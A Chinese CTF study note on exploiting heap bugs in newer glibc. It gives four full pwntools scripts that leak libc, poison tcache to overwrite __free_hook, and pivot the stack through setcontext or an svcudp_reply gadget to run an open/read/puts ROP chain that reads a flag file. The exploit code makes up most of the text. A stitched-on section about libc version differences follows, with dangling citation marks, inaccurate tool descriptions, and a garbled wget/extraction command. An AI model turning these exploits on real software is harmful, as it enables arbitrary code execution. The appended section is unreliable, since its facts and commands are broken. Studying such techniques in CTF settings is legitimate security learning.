【我的 PWN 学习手札】新版本libc下的setcontext与平替gadget

从 libc-2.29 版本起,setcontext 改用 rdx 寄存器来访问 SigreturnFrame 结构,因此无法直接利用 setcontext 的 gadget 将 free 的 SigreturnFrame 结构赋值给寄存器。

目录

一、利用gadget

(一)利用第一条gadget

(二)利用第二条gadget 

1、不需要泄露堆地址 

2、需要泄露堆地址 

二、平替setcontext


一、利用gadget

可以先泄露堆地址,然后通过下面两条 gadget 中的一条将释放的 chunk 的内存地址赋值给 rdx 然 后跳转到 setcontext 的 gadget 。

mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;
mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];

(一)利用第一条gadget

# 利用第一种gadget
from pwn import *
elf=ELF('./pwn_')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn_')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())



### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x3b6be0
success("libc base: "+hex(libc.address))
success("free hook: "+hex(libc.sym['__free_hook']))
### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)
edit(0,0x8,p64(libc.sym['__free_hook']))


add(1,0x3f8)
add(0,0x3f8)

# setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;'),executable=True).__next__()

flag_addr=libc.sym['__free_hook']+0x100
frame_addr=libc.sym['__free_hook']+0x120
buf_addr=libc.sym['__free_hook']+0x200

# read(3,buf,0x20)
ROP_chain=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx;ret'),executable=True).__next__())
ROP_chain+=p64(0x20)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])

payload=b''
payload+=p64(gadget_addr)
payload+=ROP_chain
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x120,b'\x00')

frame=SigreturnFrame()
frame.rdi=flag_addr
frame.rip=libc.sym['open']
frame.rsp=libc.sym['__free_hook']+0x8
payload+=bytes(frame)

edit(0,len(payload),payload)
edit(1,0x10,p64(libc.sym['setcontext']+53)+p64(frame_addr))
success(hex(frame_addr))
gdb.attach(io,'b free\nc')
sleep(0.5)
delete(1)
io.interactive()

(二)利用第二条gadget 

1、不需要泄露堆地址 

# 利用第二种gadget,不需要leak堆地址
from pwn import *
elf=ELF('./pwn')
libc=ELF('/home/hacker/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/libc-2.31.so')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)

### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1ecbe0
success("libc base: "+hex(libc.address))

### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)

## 不需要泄露堆指针的方法
# show(0)
# heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
# success("heap base: "+hex(heap_base))

edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)

### setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];'),executable=True).__next__()

payload_addr=libc.sym['__free_hook']
ROP_addr=payload_addr+0x8
flag_addr=payload_addr+0x100
frame_addr=payload_addr+0x120
buf_addr=payload_addr+0x200

ROP_chain=b''
# read(3,buf,0x20)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx ; pop rbx ; ret'),executable=True).__next__()) #所选libc没有直接的pop rdx;ret
ROP_chain+=p64(0x20)
ROP_chain+=p64(0)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])

payload=b''
payload+=p64(gadget_addr)
payload+=ROP_chain
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x120,b'\x00')

frame=SigreturnFrame()
# open("./flag")
frame.rdi=flag_addr
frame.rip=libc.sym['open']
frame.rsp=payload_addr+0x8
frame=bytearray(frame.__bytes__())
frame[0x20:0x20+8]=p64(libc.sym['setcontext']+61)

payload+=bytes(frame)

edit(0,len(payload),payload)
edit(1,0x10,b'a'*8+p64(frame_addr))
# pause()
delete(1)
io.interactive()

2、需要泄露堆地址 

# 利用第二种gadget,但是需要leak堆地址
from pwn import *
elf=ELF('./pwn')
libc=ELF('/home/hacker/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/libc-2.31.so')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)

### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1ecbe0
success("libc base: "+hex(libc.address))

### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)
show(0)
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success("heap base: "+hex(heap_base))

edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)

### setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];'),executable=True).__next__()
info(hex(gadget_addr))

payload=b''
payload+=p64(gadget_addr)
# read(3,add,0x20)
payload+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
payload+=p64(3)
payload+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
payload+=p64(libc.sym['__free_hook']+0x108)
payload+=p64(libc.search(asm('pop rdx ; pop rbx ; ret'),executable=True).__next__()) #所选libc没有直接的pop rdx;ret
payload+=p64(0x20)
payload+=p64(0)
payload+=p64(libc.sym['read'])
# puts(add)
payload+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
payload+=p64(libc.sym['__free_hook']+0x108)
payload+=p64(libc.sym['puts'])
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'

edit(0,len(payload),payload)

#open("./flag")
frame=SigreturnFrame()
frame.rdi=libc.sym['__free_hook']+0x100
frame.rip=libc.sym['open']
frame.rsp=libc.sym['__free_hook']+0x8

frame=bytearray(frame.__bytes__())
chunk_addr=heap_base+0x2a0
frame[0x8:0x10]=p64(chunk_addr)
frame[0x20:0x28]=p64(libc.sym['setcontext']+61)


edit(1,len(bytes(frame)),bytes(frame))
pause()
delete(1)
print(frame)
io.interactive()

二、平替setcontext

可以看到,setcontext gadget帮助我们完成了栈迁移和执行流的劫持。如果有其他gadget,也可以做到栈迁移和劫持执行流,那么也就可以平替setcontext

有这样一个gadget(在某些特定libc版本下存在):

0x7ffff7923f36 <svcudp_reply+22>     mov    rbp, qword ptr [rdi + 0x48]
0x7ffff7923f3a <svcudp_reply+26>     mov    rax, qword ptr [rbp + 0x18]
0x7ffff7923f3e <svcudp_reply+30>     lea    r12, [rbp + 0x10]
0x7ffff7923f42 <svcudp_reply+34>     mov    dword ptr [rbp + 0x10], 0
0x7ffff7923f49 <svcudp_reply+41>     mov    rdi, r12
0x7ffff7923f4c <svcudp_reply+44>     call   qword ptr [rax + 0x28]

可以设想,当我们释放一个堆块触发__free_hook时,堆块偏移0x48的位置写rbp,然后rbp偏移0x18的地方写rax,再rax偏移0x28的地方写"leave;ret"的地址,就可以实现栈迁移。 

图参考自看雪 

 

我是这么布局的 :

 

# 利用svcudp_reply gadget
from pwn import *
elf=ELF('./pwn_')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn_')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)

### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x3b6be0
success("libc base: "+hex(libc.address))

### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)

edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)

'''
   0x7ffff7923f36 <svcudp_reply+22>     mov    rbp, qword ptr [rdi + 0x48]
   0x7ffff7923f3a <svcudp_reply+26>     mov    rax, qword ptr [rbp + 0x18]
   0x7ffff7923f3e <svcudp_reply+30>     lea    r12, [rbp + 0x10]
   0x7ffff7923f42 <svcudp_reply+34>     mov    dword ptr [rbp + 0x10], 0
   0x7ffff7923f49 <svcudp_reply+41>     mov    rdi, r12
   0x7ffff7923f4c <svcudp_reply+44>     call   qword ptr [rax + 0x28]
'''

rbp=libc.sym['__free_hook']
rax=libc.sym['__free_hook']+0x100
flag_addr=libc.sym['__free_hook']+0x150
buf_addr=libc.sym['__free_hook']+0x200


payload=p64(libc.sym['svcudp_reply']+22)
# 0x0000000000022aa0 : pop rsi ; pop r15 ; ret
payload+=p64(libc.search(asm('pop rsi ; pop r15 ; ret'),executable=True).__next__())
payload=payload.ljust(0x18,b'\x00')
payload+=p64(rax)

ROP_chain=b''
# open('./flag')
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(flag_addr)
ROP_chain+=p64(libc.sym['open'])
# read(3,buf,0x20)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx;ret'),executable=True).__next__())
ROP_chain+=p64(0x20)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])

payload+=ROP_chain
payload=payload.ljust(0x100+0x28,b'\x00')
payload+=p64(libc.search(asm("leave;ret"),executable=True).__next__())
payload=payload.ljust(0x150,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x200,b'\x00')



edit(0,len(payload),payload)
edit(1,0x50,b'a'*0x48+p64(rbp))
pause()
delete(1)
io.interactive()
### PWNLibc 版本差异及其使用场景 在渗透测试和CTF竞赛中,`libc` 的版本差异是一个非常重要的因素。不同的 `libc` 版本可能导致相同的漏洞利用脚本无法跨台运行[^2]。 #### 1. **Libc 版本差异的影响** - 不同操作系统或发行版可能预装了不同版本的 `glibc` 库。这些库中的函数地址、堆管理器实现以及系统调用接口可能存在显著区别。 - 在某些情况下,即使两个系统都基于同一 Linux 发行版,但由于更新策略的不同,也可能安装了不兼容的 `libc` 版本[^3]。 #### 2. **常见 Libc 差异分析** - **堆分配机制**: 各种 `malloc` 实现(如 ptmalloc2 和 tcache)会因版本而异。较新的 `libc` 可能引入额外的安全特性,例如 tcache poisoning 防护[^4]。 - **符号偏移量变化**: 函数指针表的位置可能会随着新功能加入或者修复已知问题发生调整。这直接影响ROP链构建过程[^1]。 - **ASLR 支持强度**: 较新版通常具备更强随机化能力,增加了攻击难度;然而通过特定技术仍可绕过部分防护措施。 #### 3. **PWN 利用时如何处理 Libc 版本差异** 为了应对上述挑战,在实际操作过程中可以采取如下方法: ##### 使用工具辅助定位具体版本号 - 推荐采用专门开发用于此目的的应用程序比如 `one_gadget`, 它可以根据给定的目标二进制文件自动计算出所有可用的一键触发 shellcode 地址集合。 ##### 动态加载远程服务器上的真实共享对象副本 当本地缺乏匹配项时,则需下载对应架构下的官方包并提取其中的内容作为参考依据。 ```bash wget http://ftp.debian.org/debian/pool/main/g/glibc/libc6_*.deb ar xv data.tar.xz ./lib/x86_64-linux-gnu/ cp lib/x86_64-linux-gnu/* /your/local/path/ ``` ##### 自定义编写通用型Exploit框架 考虑到未来维护成本较低且适应范围广的优势所在,建议开发者自行搭建一套模块化的解决方案体系结构来满足多样化的需求情境。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值